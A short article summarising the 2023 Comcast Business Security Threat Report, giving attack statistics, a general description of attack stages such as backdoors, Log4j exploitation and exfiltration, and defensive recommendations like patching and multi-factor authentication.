Comcast Business released the 2023 Comcast Business Security Threat Report to help those at the forefront of security and technology glean a deeper understanding of cybersecurity threat trends, as well as preventative steps they can take to protect their organizations.
Based on the analysis of over 23.5 billion cybersecurity attacks detected by Comcast Business among their security customers, the 2023 Security Threat Report encompasses customer data across Comcast security solutions, including endpoint detection and response, managed detection and response, vulnerability scanning and exposure management, endpoint detection and response and DDoS mitigation.
The report utilizes the MITRE ATT&CK framework where possible and explores common evasion tactics, the anatomy and chronology of a cyber-attack, links between phishing and malware, exfiltration and impact techniques and consequences, and a growing vulnerability landscape.
After a hacker has breached the network, they move quickly. Using malware payloads to scan endpoints and networks for vulnerabilities, establish evasion tactics, and find ways to access networks remotely from their own Command and Control (C&C) centers, they are able to drop in and out of the network whenever they wish. By utilizing backdoor malware to create encrypted reverse SSH-proxy tunnels, they can tunnel in and out of their C&C to download additional malware and even infect other machines.
Depending on the permissions hackers are able to obtain, they can do increasingly serious damage, and backdoor malware is difficult to identify and disable once installed. 14 billion backdoor malware events were identified in the report, as well as 6 billion halted connection attempts by infected machines.
One specific vulnerability Comcast Business outlines as particularly endemic is Apache Log4j, a zero-day vulnerability that remains a significant risk due to its prevalence in java applications and the low percentage of companies that patch these susceptible applications. Three-fifths of organizations have experienced a Log4j exploit attempt, and many of the 14 million backdoor attempts halted by the company were post-Log4j exploits.
The focus of a hacker shifts to expanding their presence once they’ve remained undetected, gathering as much information as possible to increase the impact of their attack. Lateral movement activities allow hackers to spread rapidly across networks using fileless malware techniques, remote services, or remote code execution.
Comcast Business reported that the end goals of the most common cyber-attacks include exfiltration of data stored on devices and servers, denial of service attacks, service stops, resource hijacking, and holding data hostage. 10 billion of these attack events were stopped by Comcast in 2022.
To halt the advances of cyber-criminals, Comcast Business suggests a number of steps organizations can take. Patching and keeping systems up to date remains the most vitally important step, though the report also advocates for the use of Zero Trust systems, multi-factor authentication, mandatory security awareness training, vulnerability scanning, segmentation, and endpoint security. Read the full 2023 Comcast Business Security Threat Report here.
